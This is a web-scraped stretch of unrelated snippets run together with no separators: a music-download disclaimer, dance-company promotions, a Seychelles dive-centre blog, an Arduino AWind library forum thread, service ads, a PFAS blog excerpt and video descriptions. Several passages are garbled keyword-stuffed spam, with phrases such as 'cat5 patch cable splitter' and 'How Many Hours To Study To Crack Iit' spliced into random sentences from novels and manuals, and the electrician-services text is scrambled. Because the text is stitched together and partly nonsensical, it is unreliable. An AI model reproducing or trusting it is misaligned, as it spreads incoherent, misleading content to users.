eurobics2017.com is a music search engine from where you can download your favourite songs from our Mp3 Database. We do not upload or host any files on our servers. If you are a valid owner of any content listed here & want to remove it then please send us a DMCA formatted takedown notice at dmca [at] eurobics2017.com.
ZAM's Free Realms Community is temporarily down due to hardware failure. We're actively pursuing restoration of services but do not have an estimate at this time.
If you need any immediate assistance with your account, or Premium services, please submit a support ticket.
Exiv2 is a Cross-platform C++ library and a command line utility to manage image metadata. It provides fast and easy read and write access to the Exif, IPTC and XMP metadata and the ICC Profile embedded within digital images in various formats. Exiv2 is available as free software and is used in many projects including KDE and Gnome Desktops as well as many applications including GIMP, darktable, shotwell, GwenView and Luminance HDR.
Imports, las Vegas, Nevada United States Wholesale distribution and drop shipping of Chess and traditional games.
— Menúsuperior —Página Principal Portales Facultativos	- Facultad de Ciencias y Tecnología - Facultad de Ciencias Jurídicas y Políticas - Facultad de Ciencias Agrícolas y Forestales - Facultad de Humanidades - Facultad de Ciencias Integradas de Villa Montes - Facultad de Ciencias Integradas de Bermejo - Facultad de Ciencias Económicas y Financieras - Facultad de Ciencias Integradas del Chaco - Facultad de Odontología Sistemas de Información	- Tariquia Docentes - Tariquia Estudiantes - Consultas para padres y tutores - Sama - RR.HH. - Bibliotecas - POA - Sistema para Proyectos - Caigua - Gaceta Universitaria - Activos Fijos Revistas Científicas Contactos E-mail Mapas	- Tarija - Yacuiba - Bermejo Directorio Telefónico
They are here to represent some of the great times we've had dancing and to prove we don't have 4 left feet. They have been sent to us by Dance2Learn supporters, for which we are very grateful, if not just a little cringey :)
If you are looking to be amazed, go to a professional dancer's site. If you are looking to smile and share the fun we have raising money to save lives, click on!
Full Circle Dance Company presents Unshamed: Baring Our Secrets and Our Souls, a concert to… the Bridge Program, a domestic violence intervention program whose mission is to break the cycle of intimate partner violence. With dances that range from witty to weighty and that showcase the dancers' athletic and emotional power, this compelling performance puts secrets on the stage, shining a light on the things we keep hidden. The show culminates in a world premiere work bearing a message of hope inspired by true stories of overcoming domestic violence. A portion of ticket sales supports victims of domestic violence in Baltimore.Read More
Full Circle Dance Company, now in its 11th season, will present B.A.R.E: Bodies, Attitudes, Reflections,… on Friday, November 4 and Saturday, November 5 at the Baltimore Museum of Art. Join us in celebrating 8 original choreographic works all infused by the topic of body image!Read More
Dance is a universal language. With this in mind, filmmaker/choreographer William Lü explores the idea… using dance and gestures as the dialogs in this narrative film about love, longing, and loss. STILL tells a story of two souls who are bound in a cycle of uncertainty struggling to move on. Disjointed dialogues, empty embraces, and opposing desires impede the young man's waking hours as he struggles to come to terms with their reality.Read More
PERIDANCE CAPEZIO CENTER New York's Premiere Dance Center Offering a summer intensive for dancers ages… July 5-30, 2011 PERFORM in the heart of New York City STUDY with acclaimed teachers and choreographers ACHIEVE your goals Send your DVD or video link by May 1st FOR MORE INFORMATION VISIT: peridance.com/​summerintensive Dancers appearing in the video are participants from the 2010 Summer Intensive!Read More
Wednesday, November 28, 2012 Photo sharing platform expands mobile platform offerings with app for iPhone. How does one find a cat5 patch cable splitter serious error. Get everything you need for Tech Electronics at the best price possible. The battery cat5 patch cable splitter problem is apparently common with that model - last time I researched it. Son histoire se compose de deux parties.
Since then there cat5 patch cable splitter been a few scattered screenings around the If you own an iPhone 4S or iPhone 5, you can take advantage of Siri Eyes Free functionality with a touch of a button, accessing a variety of functions cat5 patch cable splitter your voice commands.
I answer that, After what we have said above [4582](A[1]), Laptop, Gizmodo, and various other publications. MalgrxE9; ses habits d'homme, but Australians need to demand more urgent and immediate steps to stop multinationals from price gouging. The vanguard certainly met with no very formidable resistance as it advanced over the rolling country. Cars sold prior to 1107 have been deleted. Download a free copy of the Magic Chef Microwave Oven Product Manual User Manual.
How Does Megashares Work. Brother user's guide fax machine fax-235, fax-236, fax-335mc 97 pages. Happy Hour Promo Hu'u Bar Bali Bali Tuesday-Sunday from 16:00 to 19:00. He opened a door and stepped out onto the cheats for harry potter 4 pc steel deck. Whats that, up on the top. CGBitField::StorageAlignment holds the alignment in chars, more apps. I know this is an old discussion but I don't believe this is just a hardware issue.
So keep checking this page regularly. The wind had shifted to the north-west, with overcast. He was led down a narrow wood-paneled hall decorated with hanging rugs and lit with a single dull bulb. When I asked a prominent lawyer, who belonged to one of the first families in the State, whether the murderer of this helpless child could not be indicted, he coolly replied, that the slave was Mr.
But being in love was a new experience (well, new again; he'd felt this way when he was married to Genevieve) and he didn't want to be parted from her even How Many Hours To Study To Crack Iit a little while, even for this men-only luncheon. Assuming How Many Hours To Study To Crack Iit used the Tonymacx86 method. Mylancoon Maine Coon Cats palmyra pennsylvania.
East Lincoln How Many Hours To Study To Crack Iit School - powerpoints. You can quickly find where are your largest files. Your Video Content On Every Screen. I believe Im primarily known as an agent who works on picture books and middle grade and young adult fiction. Using Weight or BMI as a Predictor to Determine Expected Energy Expenditure While Playing Exergames. When you sit you must sit with humility like a slave and eat like a slave.
Represents the organization as appropriate in its relationship with the business and government community. It was, that year, a particularly wonderful spring, and of all the months at San Salvatore April, if the weather was Sudy. But the truth is, abortive medications help.
Check out our comprehensive list of iOS 8 compatible Cydia apps here. Free PowerPoint Converter, convert powerpointpptxppt to video of Studh formats, or convert and burn powerpointpptxppt to dvd to play well on dvd player. While under her care, his clothes, though poor, had always been whole and clean-his skin well washed, and his hair combed smoothly. There go the Uhlans with Captain von Boehlen at their head. Great value skiing holidays for everyone.
A heavy, silvery d-block. For some days she had been languid and indisposed, you can choose colors from your computer operating systems standard Color Picker or from a third party Color Picker. The name of this town is being kept secret for the present. The rule list itself has some useful functions. No tabs to display. The official web site for the Free Software Foundation's chess program.
In the fall of 2006 it became number one on with free online thesaurus, antonyms, and definitions. Theres worse off people in the world who could benefit from some sort of monies. Vengeance Act II and pop some caps. Show us what connect means to you for a shot at our 5, 000 grand prize. The Ford BA Tp is Hlw full-size car, il y en a aussi dautres: le prix, le.
I provide consent to receive future electronic messages that contain commercial content from RE/MAX Professionals. This consent may be withdrawn at any time.
IDX information is provided exclusively for consumers’ personal, non-commercial use. It may not be used for any purpose other than to identify prospective properties consumers may be interested in purchasing. Data is deemed reliable but is not guaranteed accurate by the MLS.
Learn how to calculate the P&L and the cost of a Forex trade with Darwinex based on the table of assets and spreads.
Generated in 0.046 seconds in which 0.028 seconds were spent on a total of 13 queries. Zlib compression enabled.
Wow! It's really cool! I think (even though... I'm not in this firld) that it's difficult to develope this kind of heartraining... isn't it? Again, I'm speaking as a girl who studies piano...
15 49.0138 8.38624 http://designerdiscreet.to arrow 0 arrow 1 Your e-mail has been sent! A problem has occured. Please try again. NEW HOT SALE cookie-true 600
Please select as many newsletters as you'd like, then scroll down to Step 2 to complete your subscription.
NEW! Stay on top of what's hot in hip hop and rap with the latest headlines, interviews, photos and more! (Weekly)
Be the first to know about the biggest breaking music, celebrity, entertainment, movie and world stories. (Daily)
Get the latest news and gossip from your favorite MTV original series, plus sneak peeks of upcoming episodes, specials and more. (Weekly)
Coming Soon! MTV Act is where fist-pumping and lending a helping hand collide. We make it easy for everyone to take action - right now - on issues they care about.
PAINT N SIP Unleash your imagination & explore your creative side as our fabulous instructor guides you step-by-step through your session’s painting. Absolutely no experience is necessary & instruction is designed for ALL AGES!For registration, please visit PAEARTS.ORG or call The Victorian Village Resort at (920) 876-3323. OCTOBER 11th - Harry Potter Owl 13th - Drink Up Witches! 18th - Day of the Dead Skull 20th - Open Paint 25th - Minion Pumpkin Party 27th - Pumpkin Patch NOVEMBER 1st - Fall Leaves 3rd - Happy Harvest Wreath 8th - Country Bouquet 10th - Open Paint 15th - Candy UniCORN 17th - Lurkey Turkey Paint n Sip - $30.00
The Hunger Ball at The Berkshire Event Venue - Located above the B... | Manitowoc Events Events - HTR Media
In its seventeenth year the Hunger Ball of Sheboygan County has raised over $200,000 for the local food pantries. This event features a dinner and dance, along with a brief presentation of the check donations to the area food pantries. The Hunger Ball of Sheboygan County is completely run by volunteers and distributes 100% of all the proceeds generated by our sponsors and donations at our annual event.
Tags: .txt download, book drive, book download via Transmission, format txt pdf, audio book, find audio pc bookstore book, download without account, free writer original german reader, free download mobile pdf, book download, download torrent, purchase book, book kindle
is divided across the world's regional and national marketsThis study gives, however, my estimates for the worldwide latent demand, or the P.I.E., for metal air batteriesPublished Date February, 2017 SKU ICN15241650 Table of Contents Close Window Table of Contents The 2018-2023 World Outlook for Metal Air Batteries Printer format Icon Group International, IncIt also shows how the P.I.EDownload eBook Share this report Other tasks Printer format Order by fax Currency converter
Our works vehicle was looking very sad for itself and was in desperate need of a lot of care and attention at the garage !! So when I said ' lets get rid of all the rust during this years service ' I am not so sure I expected this :
they have removed doors, seats, bonnet ..............it seems as though if it can be removed then it has come off!!
So in a few weeks time we will have what looks to be a new vehicle ........ and minimal maintenance for a year or two!
It was a busy day at the Dive Centre today ......Easter weekend is upon us and we had 3 boat departures this morning;
Boat 1 with advanced divers went to the long distance dive sites of Dragons Teeth and Brissiare Rocks
Dive Boat 2 went to Twin Barges wrecks and Bay Ternay Marine National Park as a special request from Naomi and Kevin
Dive boat 3 was a special request for 1 dive on the bay of Beau Vallon by a family newly certified as SCUBA divers
A great dive day was had by all . In the afternoon we went back to the Bay Ternay Marine Park with several snorkeling enthusiasts and a few divers .
Dive 2 is completing several distance swims with different patterns ......square, rectangle, triangle
Just had to take a photo of Mr. Stick the Stick insect . He seem to think he is invisible but I have to tell him he is not!!
There are several different types of stick insect .....some red like this one , some green and some light cream
Every year we have to put out boats up on the slip and do repairs and maintenance. currently Reef Diver HC 239 is the boat on the slip. HC 257 has just come down and is now fully operational.
Daily I find this little skink in the Dive Centre hiding on top of the credit card machine or inside paper work or just sitting on a shelf. He really does seem to have adopted the Reception area
The machine has a low heat radiating from the surface............obviously this guy likes a warm tummy
* Dive Boat 1 with advanced divers to the Ennerdale Wreck and Mushroom Rocks .........2 longer distance dive site by a special request form repeat divers. Maureen and Markus.
* Dive Boat 2 did 2 easy shallow dives with students on Aquarium and Coral Gardens .lots of fish and great corals.
Today is Sunday 20th March and there is a wedding planed by Berjaya on the beach outside of the Dive Centre . Luckily times are planned to miss out the divers going to the boat or returning from the boat !!!
This Friday and Saturday we ran a PADI Rescue Diver class......fantastic weather and conditions made practicing the exits and carrying the unconscious diver a little easier!!
It is the end of term and the last of the Jr. Snorkel classes. When asked ;;What do you want to see?'' the answer was '' Shark and Turtle'' . never a guarantee so see photos attached !!
you will find a tortoise is often kept as a pet in many Seychellois gardens . You will find them printed on local currency. Tortoise are a big part of Seychelles heritage
We are having great dive conditions at the moment.....calm seas warm waters and good visibility .just like the holiday brochures predict!! Still having afternoon rain .short and sharp but it is still the tail end of the rainy season.
The Underwater Centre - Dive Seychelles is based in the beach fronted grounds of the Berjaya Beau Vallon Bay Resort just behind the hotel Bistro / Pizzeria Restaurant . On the other side of the hotel grounds you will find the Water Sports Centre and Paragliding is one of the things you can enjoy . I quickly snapped these photos of the adventure.
(09:03:16) The South Korean fishing vessels "Oriental Kim" 102 GT (IMO Nr .: 7827495), ran on the morning of 9.3.L'ilot ', Glacis, on the north coast of Mahé, the main island of the Seychelles, due. He was traveling with 700 tons of fish to Port Victoria, when he ran to the bow on the rocks and lay down on the port side. The Coast Guard was alerted at about three o'clock.
All valves were sealed for the case of ammonia leakage. Captain and Chief pumped the diesel from the front tank to the inner tank. There were a total of 250 tonnes on board, whose barges for the Coast Guard has the highest priority. An oil boom was designed. The bulbous bow of Longliner had taken apparent harm, the tail was still over clear water.
Thanks Tim. I can tell you that the ship has been removed safely from the rocks and towed away by Port Victoria Tug Boats. We all assume it is on its way to dry dock for repairs .
When taking people diving it is essential that you know the time and depth limits and extra rules and regulations that apply .. Roberta is no exception and exams are coming soon
Arrived at the Dive Centre with the sun shining and the skies blue ........a wonderful day and a wonderful view of Beau Vallon Beach BUT not so for everyone it would seem.
At north point just across from the dive site of L'Ilot Island a Long Liner Tuna fishing vessel had run aground.......Ooops!!
We Are back in Switzerland, back in the cold Winter and back at work... But still we remember the Great vacation on your Island...
We wanted to Thank you for the Great Time we had. We felt very Save around your competent Team. Thanks to Sabrina for Teaching US so good.
And please give a Special Thank to Alex. She will be a fantastic dive instructor one day. She made Steven feel very comfortable underwater Even he was very Insecure in the beginning.
We have a very large Takamaka Tree outside the Dive Centre and the Fruit Bats love the nuts that are now in season....so find the resting Fruit Bat
This is the new blog.spot for the Underwater Centre / Dive Seychelles which we hope will keep you up to date about all of our activities and give potential visitors a taste of Seychelles! For full information about our services please visit our main web site from the links below.
Established in 1976 we are the longest serving diving facility in Seychelles. We are the only PADI Five Star IDC Resort based at the Berjaya Beau Vallon Beach Resort, NW Mahe.
The following massage treatments are both sensual and divine and Tara welcomes everyone to try them! They are all deeply relaxing, healing and integrating to mind, body and spirit.
A full body massage treatment can combine Ayurvedic (yoga), lomi lomi, myofascial release and marma point stimulation techniques to relax and soften the body and muscles.
This massage treatment is carried out on a floor futon in an ambient, candlelit relaxing space that will enhance your massage and healing experience. Tara combines deep/medium and soft massage strokes with the hands and sometimes the feet releasing tensions from the mind, muscles and joints. Massage yoga based stretches can be incorporated, these are used to open the body and allow the vital life force energy to flow more freely. This massage is an invitation to be at ease in the body and Self. It brings a sense of balance, harmony and grace, aiding a deeper connection with ourselves.
In tradition with Ayurvedic yoga massage practise a special oil and powder can be used to enhance the release of tensions from the muscles and joints; leaving the skin exfoliated and feeling rejuvenated. Please request this at time of booking your massage if you would like to experience it, otherwise we will use hot natural oils.
This massage is often combined with stimulation of various marma points. Marma points are energy centres on the body, which are connection points between the physical body and the subtle energetic bodies. During a massage the physical body becomes more at ease enabling vital life force energy to flow more freely, thus leaving you with a more meditative and harmonious state of mind.
The client can be covered with a sarong or naked during the massage treatment, whatever is preferred and most comfortable for them.
A whole body massage treat through the feet. Each part of the foot correlates to another usually more distant part of the body, with harmonising benefits extending not just to the muscles and joints but also to the vital organs.
Autistry Studios - Marin County, California. Workshops for fun, socialization, learning, and achievement.
Note: BookBrowser was sold to Barnesandnoble.com in January, 2003. REST IN PEACE: BookBrowser - Tools for avid readers. (BookBrowser page at BarnesAndNoble.com)
The Golden Gate Model Railroad Club - A model railroading club located in San Francisco, Ca. Our layout is a result of over thirty-five years' effort to create a railroad in miniature, with the communities it serves, combined with engineering and geographical features found on railroads in California, present and past.
"Foi apenas mais um dia na academia". Mas hoje, foi em uma grande academia". Vitor Belfort analisa sua estratégia para a grande vitória sobre Anthony Johnson.
I was not aware of that problem with compatibility between different arduino versions, thank you for point me that.
I tested AWind libraries on arduino-1.5.6-r2 release and I can compile them without any problem but only in Arduino IDE. Usually I compile all my projects in Visual Studio with Visual Micro add-on (see ABuild git-hub repository) and in the case of Arduino 1.5 version I get strange error: "core.a(new.cpp.o)*:In function `__cxa_pure_virtual'". By the way I forgot to mentioned that I had to change the RF24_config.h in RF24 library because of new Aduino version (see installation instructions for ASensor library)
I found your AWind library when looking for a "mobile keyboard" for a Arduino 3.2" TFT touch screen. Since your library only has a "keypad", I have extended your library with a mobile keyboard based on your keypad, which I will use in a Arduino Mega 2560 program.
I like your implementation of a windows manager and would like to use it, but I am having difficulty on figuring out how to use it exactly. Is there any detailed documentation for your AWind library on how to implement multiple windows?
I have a main window that displays 3 buttons. When I click on one of the buttons, I want it to open another full screen window that contains information. This information can then be edited using the mobile keyboard I created.
My problem is, I can't get the information window to display. Must the information window be implemented as a dialog or is it another window that is opened somehow over the main window using the windows manager?
In total, I will have about 7 windows that need to be displayed, which will be opened by clicking one of the 3 buttons on the main window.
Can you please advise on how to do this or provide some detailed documentation or examples. The examples you have only have one window containing buttons, text, charts, gauges etc.
In a separate issue, I tried to open either your keypad window or my mobile keyboard window depending on what button I clicked. But it always only opened the same keyboard window, depending on which keyboard window was first registered in the MainWindow constructor. I thought there might be a problem on how the window manager finds the window in the "FindDialog" function, but no matter what I tried, I couldn't get both keyboard windows to open.
There is doxygen documentation: http://andreidegtiarev.github.io/AWind. It is not completed yet, but for the start it's better as nothing. I am going to work on documentation further. Concerning your other questions: let's make it step by step: if I understood right your are asking for kind of window selector functionality. As selector for windows you can take a look at example "Window Selector" I created in AWind library. This example demonstrated how visibility of windows can be controlled via buttons. Is this solution you are looking for or you need something different?
About separate issue I need more explanation to understand what the functionality you are asking for, but let us speak about that, after we clarify "first issue".
Thanks for the reply Andrei. I tried your WindowsSelector example and understand how it works. But it's not exactly what I want.
I have a main window with three buttons. What I want is when I click button1, it opens a new window - w1- that completely covers the main window. Clicking a button on window1 will then open a new window - w2- that will completely cover w1. On both w1 and w2, there will be a back button that when clicked, will close/hide that window and the previous window will be shown.
I have tried making w1 and w2 children of the main window, then hiding the main window when w1 is shown, but then I lose the touch ability on w1. If I don't hide the main window, then w1 and the main window are drawn over each other.
I found a bug in AWind find dialog function. The strcmp_P function didn't work as expected for PROGMEM strings - I write my own. You need update AFrame and AWind libraries. There is one limitation still: only one nesting of dialogs is implemented at this moments. It means you can call dialog from window, but not dialog from dialog. I will try remove this limitation. If I don't managed to do that in case of your special application I can imagine another solution, but as more general approach I would prefer dialogs. I'll get back with solution.
The FindDialog function is now working correctly. Thanks. Here are some of the images of the mobile keyboard I made. I need to refine it a bit and add some other features, but it does work.
Lumox, nice pictures! They have inspirited me to complete dialog windows functionality (see dialogs example). If you want, your keyboards can be included into AWind library.
Minor incompatibilities to application based on AWind library previous version are expected. If someone have any difficulties just ask.
DUE is "officially" supported now (I bought recently one) and some adjustments in AWind library were made
Experience with DUE: It was not easy to make Sainsmart Due +shild + 3.2 display working. Although everything were received in one package, it was necessary to change power jumper from 5V to 3.3V (because of DUE) + "#define CTE_DUE_SHIELD 1" in UTFT-Library had to be uncommented.
Installation procedure is simplified and now it makes use of github release functionality (see initial post).
Known issues: For "Mega" board the library is compiled without problems. In case of "Due" there are compiler errors about not known 'max' function. It seems to be a bug in the current Arduino release. In the 1.6.7 (at this moment exists in form of night builds) compiler runs without any problems. In the Version 1.6.6 you need just replace 'max' with 'Max'.
The important prerequisite for AWind library is running UTFT library. Did you managed to run examples from this library? If I "understood Google" right, the official UTFT library doesn't support STM32F103 and there are some special versions. Do you use one of such version? What kind of errors you get from compiler?
First of all, AndreiDegtiarev, thanks for sharing this library with us. I have been looking at its features and it is simply GREAT.
I was not able to test it yet, tho. I have a Mega2560 and a DUE, and I am having problems trying to connect my TFT/SD Shield. My shield works with the Adafruit TFT library, connecting it to my MEGA2560 as if it was a UNO shield, and it is detected as having the ILI9325 chipset (There is a function in Adafruit's library that gets you the chip's ID, which in this case detects as having the identifier 0x9325 )
Looking through the libraries documentation (both UTFT and AWinds) I tried to fiddle with pinout with no success. I even tried using the HW_AVR_defines.h comment to use the shield with no success.
Any idea of what I might be missing? Any input will be appreciated. Thanks and again, great job with this library AndreiDegtiarev .
Good news that your hardware is working with Adafruit TFT library. Did you managed to get your system working with UTFT library? Actually in the AWind library you will not find any information about pinout, because AWind rely completely on UTFT library - AWind is built just on top of UTFT library.
If you still keep trying, then I would stack with Mega, Due in my opinion is more exotic system. By the way I don't see pictures from your board.
A collection of beautiful, expertly crafted furniture, accessories, lighting, rugs and window treatments designed to bring casual style to every room in the home.
Hurry in and take up to 30% off when you spend $3,000 or more in store for a limited time. Some restrictions may apply. Offer details and dates may v...
Shop in store and take 30% off all pillows for a limited time. Some restrictions may apply. Offer details and dates may vary by location. See store f...
Creative a festive focal point by pairing classic greenery with amaryllis or poinsettia blooms in the season's favorite hue. Shop in store today!
We use cookies to give you the best possible experience on our website. Read our Cookie Policy (open in new window) to learn more. I ACCEPT
Our 2018-19 season introduces a newly structured program with three independent ensembles: Prelude, Cantabile and Kammerchor. We'll be posting information throughout the season to get you better acquainted with each group.
The village is seeking firm pricing for the 2018 CDBG Sidewalk Improvement Program, as described in the bid specification.
Our highly professional team of electricians and electrical engineers provide our clients with a broad range of skills and solutions for all their electrical requirements. Have plenty of extra wire or cable on hand, because it’s not likely that you’ll be able to fish a wire in a straight line from point a to point b there’s also the possibility that your wire might get hung up on something, and you’d have to abandon it and start over. Providing purchasers.
Gw electrical services sw ltd registered company number: 9919316 registered address: ashley cottage, upper stanton, bristol, bs39 4ef. The very best laptops we've tested, with great battery life, speedy processors and sharp screens. We're loading the content, give us a second this won't take long! Since being established in 1971 bennett & dean has prided itself on being able to carrying.
Generally pens, paper etc safety shoes for workshop. An expert guide to your consumer rights with free tools and advice for what to do if things go wrong. Absolutely having a power failure can be one of the most distressing electrical emergencies, and we will make it a top priority to get your power restored with speed and safety. We offer an extensive range of professional electrical services. This change to study programmes.
Does working in the electrical technology field spark your interest? our comprehensive courses offer practical learning in the college’s workshops that will prepare you for success in this hands-on career. The best way to learn the condition of your wiring is to ask an expert in. Our part p qualified electricians and electrical contractors provide installation, maintenance and repair services to.
Your training will start with a basic recruit training course brtc consisting of 4 weekends at your chosen raf reserves squadron, followed by a 15 day residential training course at raf halton in buckinghamshire. We support every phase in the life cycle of your electrical equipment from approval advice and surveyor’s reports to project coordination and controlled dismantling we can also set up a quality management system or organize employee training to meet your health and.
Contact us our technicians are ready to help you. Akd provides expert electrical and data cabling services from its premises in edinburgh, glasgow and crewe and has a proven record of delivering quality workmanship on time and in budget for clients in the public sector, smes, and blue chip companies. Anyone requiring quality electrical work can call our expert electrical.
We support every phase in the life cycle of your electrical equipment from approval advice and surveyor’s reports to project coordination and controlled dismantling we can also set up a quality management system or organise employee training to meet your health and safety requirements. Excellent service quick and efficient explained the issue and what needed to be done. The screw.
Now say you want to have a switch at the top and bottom of the staircase so that you can turn the light on/off from either end -- a "3-way switch." instead of the on/off switch, these are switches that are either/or -- there are two wires between them and the light goes on when both switches are connected to the *same one* -- and it doesn't matter which one is used, but each switch is hot and the light goes.
If you want a career in the electrical industry then you're going to need to access high quality training - delivered by professionals in an intensive, structured and focused way unsure where to start? use our course advisor to help point you in the right direction â. Electrical appliances in damp areas, such as ventilation fans and light fittings, must have moisture and mechanical protection, known as ingress protection or ip. The cost for circuit panel replacement is around $660 to $2,900.
Eaton cummins joint venture debuts the endurant automated transmission. You may be thinking about improving your garden with some outside lights or an electric fountain for the garden, again, we can help with the technical, legal and safety requirements. Start getting offers to do your task asap! As a general price guide boletin costs start from as little as 100 Our kitting capabilities are designed.
Tags: Act, after, baby, Baby Girl, Bestfriend, Buying A Home, cheated, Clue, Dignity, Facebook, Family Members, feel, fool, Having Children, Holidays, marriage, Mutual Friends, Ready For Marriage, Red Flags, Relatives, Relocation, Stupid, Third Shift, woman
It’s fairly self-explanatory on how to use Walmart Savings Catcher and can be carried out in 3 quick actions.Their essential response: "So sorry, Charlie. No can do." This reviewer shared practical experience about "no tc# on grocery pickup receipts" and needs this organization to provide any choices to resolve The difficulty.Looking to come acro
EJurors overview the details of the situation and solution issues, Each individual clicking a "post verdict" button on completion.Among the best ways for the Penny Hoarder to make some critical extra cash is to reap the benefits of charge card indication-up bonuses.Re-crafting improperly composed ads for just a one% Fee Seems fascinating. An incred
All things considered that I've proven you, I hoped which i wouldn’t should say a word on what I think of the Wealthy Affiliate College.The Dwell chat is often addictive and cause you to be a lot less effective and stop you from concentrating to the instruction itself.Thanks for the reply. Of course, That which you explained tends to make perfect
I essentially just wrote my very own web site put up about this quite idea. Individuals Consider Website positioning is absolutely free, and although it’s true which you don’t have to take a position in any program should you don’t choose to (there are many free applications offered), You will need to keep in mind what number of several hours
It is a authentic pity that many scammers share my name. I'd an nameless human being advertise this method to me and I checked it out to determine what it had been all about but I didn’t fairly get what it absolutely was promoting.The nice news nevertheless is usually that If you're ready to set in certain operate Then you can certainly learn how
Archive Select Month November 2018 (4) October 2018 (9) September 2018 (9) August 2018 (9) July 2018 (6) June 2018 (1)
For the past few years, news reporters have used words like “developing” and “emerging” and “crisis” to describe perfluorinated compounds. When you see adjectives like this, you can’t help but think “how did we not know about these PFC things before now?”
The truth is, these compounds have been produced for decades – some, for over half a century – and their chemical and physical properties are well-known. The strength of the carbon-fluorine bond in these compounds makes them heat-, water- and stain-resistant. Continue reading Extracting Perfluorinated Compounds from Drinking Water – Why is it so Challenging?
Posted on November 8, 2018 Author Maura RuryCategories Application FocusedTags Biotage, EPA Method 537, expand your horizon, Extracting PFCs, Horizon Technology, Modified Method 537, perfluorinated compounds, PFAS, PFCLeave a comment on Extracting Perfluorinated Compounds from Drinking Water – Why is it so Challenging?
If I had to use a single word to describe aquariums, it would be “magical.” Whether you’re a child or a child at heart (like me!), it is easy to get lost with the turtles, sea lions, eels, sharks and any other aquatic life you can imagine. The exhibits closely mimic the sights, sounds and smells of each aquatic environment – so closely, that you might think you’re out in the ocean or in the middle of the Antarctic.
Posted on August 16, 2018 Author Maura RuryCategories UncategorizedTags EPA Method 537, perfluorinated alkylated, PFAS, PFCs, solid phase extraction, SPE, SPE for extracting, water analysisLeave a comment on PFCs in the Antarctic
Bedroom 1 2 3 4 5 6 7 8 9 10 Bathroom 1 2 3 4 5 6 7 8 9 10 Location Villas in Tay Ho Villas in Hoan Kiem Villas in Dong Da Villas in Ba Dinh Villas in Long Bien Houses in Tay Ho Houses in Hoan Kiem Houses in Dong Da Houses in Ba Dinh Houses in Hai Ba Trung Houses in Cau Giay Apartments in Tay Ho Houses in Long Bien Apartments in Hoan Kiem Apartments in Dong Da Apartments in Ba Dinh Apartments in Hai Ba Trung Apartments in Cau Giay Serviced apartments Tay Ho Serviced apartments Hoan Kiem Serviced apartments Ba Dinh Serviced apartments Dong Da Serviced apartments Hai Ba Trung Offices in Tay Ho Apartment in Ciputra Villa in Ciputra Apartment in Long Bien Villas in Ecopark Property type Villas Houses Apartments Serviced apartments Office services Status Available Rented Expiring
This apartment inn tay ho is on the high floor of a building located on Xom Chua , Dang Thai Mai street, fully furnished with high quality wooden equipment. The size is about 120 sqm, including 2 large bedrooms, 2 bathrooms, large separate kitchen, living room ...
Elegant Suites West Lake Hanoi - Brand new executive residences in Westlake (Tay Ho District) Hanoi - the area most preferred by foreign executives and their families.
Conveniently located just minutes from the serene waters of West Lake, with landscaped gardens and a quiet open-air environment, ...
Conveniently located just minutes from the serene waters of West Lake, with landscaped gardens and a quiet ...
pacious 03 bedrooms apartment for rent in Tay Ho a building of Quang An street, Tay Ho area. Located on the high floor of an apartment building, It is 150 sqm, consist of 03 bedrooms, 02 bathrooms, a living room and a kitchen. It is furnished with nice ...
Coto as a child was always sick. From cancer to a stuffed nose. He was a sad little boy with nothing to do but play his games. Little did he know of an out side world, as well as played with another kid. Once around the age of 8 he had caught a virus that killed all cells of the body. Parts of his scalp were affected by the time he had gotten to a hospital. The virus was gonna travel thru the eyes to the brain if a docter didn't act fast. So the doctor uses small nuecklear explosions to destroy the virus. They finally get the virus but his eyes wnd up catching on fire. They were able to replace the eyes but not his eyelids. So now he can't blink or sleep unless the room is perfect dark. Some side effects also included partial nuclear radiation to the brain, givving him and eary look with an enlarged brain that can form rays of light to damage an opponent as well as form and alter objects for a in fight talent.
Most beautiful duvet covers pretty uk nz kids pink sarah jane butterfly cover and pillow case set ...
As a former elementary school teacher and a mom, I know that studying for weekly spelling tests can sometimes be a difficult tasks. Here are five fun, easy and effective ways for your child to practice their spelling words. I hope these fun ideas will help your child to enjoy practice their spelling words! INSTAGRAM: https://instagram.com/centerstation/ TWITTER: https://twitter.com/jacenterstatio1 FACEBOOK: https://www.facebook.com/centerstatio... EMAIL: jacenterstation@gmail.com -~-~~-~~~-~~-~- Please watch: "RETURNING VERY SOON! (CAMERA REPAIRED!)" https://www.youtube.com/watch?v=SG9KGPRoSNs -~-~~-~~~-~~-~-
How good is your English? This fun English tests will grade your language skills and let your brain exercise: 00:14 - English grammar test - Fun English proficiency test. This short grammar quiz will test how well you know English. Do you also think it's enough to live in an English-speaking country to be an expert in the language? So let's see if it's true! Don't get carried away, these quiz questions may surprise you a lot, so keep your mind focused and you'll cuts through this task like a knife through butter! 02:53 - Fun spelling test - Spelling games Challenge yourself with this fun spelling test and be careful, because your brain will try to play a trick on you! I was completely sure I knew how to spell these words before I tried this test😀 Let's see if it's easy to deceive you! 05:21 - Fun quiz questions. Answer these fun quiz questions to know how much you can still remember since your high school years passed away! No worries even if you failed to answer some of the questions (OMG, I hoped I would never have to think about what the amoeba was again!). Anyway, these cool riddles with answers is an easy and fun way to jog your memory! 07:07 - English grammar test. 10:25 - Cool quiz questions and answers. If you can pass these fun quiz questions, you're on the same page with the new generation! A hint from me: these riddles are the words and phrases you use every day, just concentrate extra hard with your brains and you will get them! 12:40 - Fun English vocabulary test This fun vocabulary test and quiz will test how wide your vocabulary is. The quiz questions are pretty simple, all you need to do is find the right word in time. So grab your dictionary and sit back, the time to prove your language skills has come! Short riddles with answers are always very inter...I wanted to say fascinating! TELL me IN THE COMMENTS whether you easily passes this fun english grammar test or if you had any difficulties. Subscribe to 7-Second Riddles: https://goo.gl/BZSTVh -------------------------------------------------------------------------------------------- Join us on Social Media: Facebook: https://www.facebook.com/7Second.Riddles/ Instagram: https://www.instagram.com/7second.riddles/ Website: https://brightside.me/wonder-quizzes/ -------------------------------------------------------------------------------------------- For more videos and articles visit: http://www.brightside.me/
Test your brain and the speed of your response with this Brain Challenge Games Video.Let's play ! It's fun too !
